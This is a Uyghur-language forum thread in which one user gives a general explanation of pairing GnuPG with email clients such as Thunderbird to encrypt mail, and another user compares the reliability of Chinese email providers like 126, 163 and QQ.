يازما يوللاش تەرىپىدىن يوللانغان oghuzkb » دۈيشەنبە ئاۋغۇست 02, 2010 10:17 pm

[quote]ئەسلى يوللىغۇچى: [i]Bidar-Qutlan[/i] ، ۋاقتى: 2010-8-2 17:54 [url=http://www.ukij.org/munber/redirect.php?goto=findpost&pid=3125&ptid=577][img]http://www.ukij.org/munber/images/common/back.gif[/img][/url]

سىز تەۋسىيە قىلغان تور بەت چەتچىكەن، مۇمكىن بولسا ئىشلىتىش ئۇسۇلىدىن تەلىم بەرسىڭىز. [/quote]
ۋاقتىم بولسا تەرجىمە قىلىپ قويار ئىدىم، تولىمۇ ئەپسۇس بەكلا ئالدىراش بولوپ قالدىم. بىر قىرىندىشىمىز بۇرۇن بىلىك مۇنبىرىگە مەخسۇس تېما قىلىپ چىقىرىپ قويۇپتىكەن، ساقلىۋالماپتىمەن...بۇنى ياڭغۇز ئىشلەتكىلى بولمايدۇ، چوقۇم سىز ئىلخەت يوللايدىغان ئادەممۇ شۇنى ئىشلەتكەندە ئاندىن ئەھمىيىتى بولىدۇ. بۇ دېتالنى ئادەتتە ئىلخەت پروگىراممىلىرى (مەسىلەن:
* Mozilla/Thunderbird
* Evolution
* Pine
* Kmail
* Eudora
* Mutt
* exmh)

بىلەن باغلاپ ئىشلىتىسىز. Thunderbird ئادەتتە كۆپىرەك ئىشلىتىلىدىغىنى. بۇنداق پروگىراممىلار pop3 ياكى imap دىگەندەك ئىلخەت مۇلازىمەتلىرىنى قوللايدۇ. yahoo, msn, hotmail قاتارلىقلارنىڭ بۇنداق مۇلازىمىتى ھەقلىق، لىكىن گۇگىلنىڭ (gmail) ھەقىسىز، دىمەك سىزدە gmail بولسا، ياكى سىزدە ئۇنىۋىرستېت تەمىنلىگەن ئىلخەت مۇلازىمىتى بولسا ئاندىن سىناپ كۆرسىڭىز بولىدۇ. ئالدى بىلەن يۇقاردا تىلغا ئىلىنغان ئىلخەت پروگىراممىلىرىدىن بىرىنى قاچىلايسىز، ئىلخەت ئادرىسىڭىزنى پروگىراممىغا كىرگۈزۈپ بولغاندىن كىيىن ئاندىن GnuPG نى قاچىلايسىز، قاچىلاش ئاسان، GnuPG ئۈچۈن ئايرىم پارول بىكىتىسىز، دىمەك قوش قەۋەتلىك پاروللۇق بولىدۇ. بۇ دېتالنى ئىشلىتىپ خەت يوللىغاندا خەت سىز تەڭشىگەن دەرىجە بويىچە خەت مەزمۇنىنى شىفىرلايدۇ، خەت ئەۋەتكەن دوستىڭىزمۇ بۇ دېتالنى ئىشلەتكەن بولسا ئاندىن ئۆزىنىڭ پارولى ئارقىلىق خەت مەزمۇنىنى كۆرەلەيدۇ، 3- بىر ئادەم، يەنى ئىلخەت ئوغىرلىغان ئادەمگە بىر دۆۋە يۇقۇرى دەرىجىدە شېفىرلانغان بەلگىلەر بويىچىلا بارىدۇ.

ئەگەر قىزىقىدىغانلار كۆپ بولسا بىرەر سىن ھۆججىتى ئىشلەپ يوللاپ قويارمەن بولمىسا.

[[i] بۇ يازمىنى ئاخىرقى قېتىم تەھرىرلىگۈچى: oghuzkb ، ۋاقتى: 2010-8-2 23:19 [/i]]

kaqkuz
يازمىلار: 20
تىزىملانغان ۋاقتى: سەيشەنبە ئىيۇل 31, 2007 5:12 pm
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان kaqkuz » چارشەنبە ئاۋغۇست 04, 2010 7:41 am

163نىڭ ھېساباتىنى ئۆچۈرمەيتتى، مەن 2002-يىلى تىزىملاتقان ھىساباتىم ھازىرغىچە تۇرۇپتۇ بولمىسا، ئىشلىتىپمۇ باقمىغان ئىدىم. ھەقىقەتەن ئۆچۈرۈلگەن بولسا، پارولدا مەسىلە بولمىسىلا، باشقا مەسىلە تۈپەيلىدىن بولۇشى ياكى ھېسابات نۇمۇرى، مەلۇم سەۋەبلەر تۈپەيلىدىن، چەكلىۋىتىلگەن بولۇشى مومكىن.
مەن 126 ۋە QQنىڭكىنى ئىشەنچىلىك دەپ قارايمەن. 126 ئەسلى كارخانا ئېلخەت ساندۇقى ئىدى، كىيىن، شەخىسلەرگىمۇ بېرىلدى. بەكلا پاكىزە، ئاساسەن ئەخلەت كەلمەيدۇ. ئېلخەت ساندۇقىنىڭ بەت كۆرۈنۈشىمۇ خېلى ساپ. sina.cn بولسا، يولغا قويۇلغىلى ئۇزۇن بولمىغان، تېخى مۇشۇ يىل 4-ئايدىن باشلاپ شەخىسلەرنىڭ ئېلتىماس قىلىشىغا يول قويۇلدى. بەت كۆرۈنۈشى، ئېلاندىن خالىي بەكلا پاكىزە، بىراق ئېلخەت ساندۇقىنىڭ ئېلخەت تاپشۇرۋىلىش سۈرئېتى بىر ئاز ئاستا ھەم خەت ساندۇقىدا بولۇشقا تىگىشلىك بەزى ئىقتىدارلار كەمچىل. بۇنىڭغا باققاندا 126 ئىشەنچىلىكرەك.
QQنىڭكىنى ئىيتساق، بۇلارمۇ ئالدىراپ تازىلىمايدۇ. ئۇنىڭ ئۈستىگە نەچچە ئاي كىرمىگەن دىگەن ئۆلچەمگە VIP ئەزالار تەدبىقلانمايدۇ. سىز ئالسىڭىز VIP خەت ساندۇقى ئالىسىز، شۇڭا ئەنسىرەش ھاجەتسىز.

ئىنكاس يوللاش

گە قايتىش

توردىكى ئەزالار

مۇنبەردىكى ئەزالار: 1 ۋە 0 مېھمانلار